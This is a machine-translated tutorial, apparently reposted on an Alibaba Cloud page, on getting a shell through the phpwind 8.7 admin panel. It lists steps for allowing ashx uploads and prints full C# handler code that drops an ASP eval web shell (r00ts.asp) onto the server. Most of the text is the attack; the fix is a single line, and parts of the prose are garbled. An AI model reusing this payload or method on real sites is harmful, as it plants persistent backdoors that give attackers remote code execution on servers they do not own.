Use shell in the phpwind 8.7 background and fix it

Source: Internet
Author: User

First, open the background map and add an ashx Suffix of 2000 to the attachment settings.

In the group, I downloaded the previous ashx.txt and changed it to fuck. ashx.

There is an attachment on the other side of the article that uploads and throws ashx on the premise that it is iis Apache. I really don't know how it works.

Then, open the background map attachment and slide it down to see the newly uploaded ashx.

After opening the file, the r00ts. asp password r00ts will be generated under the directory.

The following code is used:

 

<% @ WebHandler Language = "C #" Class = "Handler" %> using System; using System. web; using System. IO; public class Handler: IHttpHandler {public void ProcessRequest (HttpContext context) {context. response. contentType = "text/plain"; StreamWriter file1 = File. createText (context. server. mapPath ("r00ts. asp "); file1.Write (" <% eval request (\ "r00ts \") %> "); file1.Flush (); file1.Close ();} public bool IsReusable {get {return false ;}}}



Www.2cto.com provides the repair solution:


Only the php suffix is retained and execution is complete.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.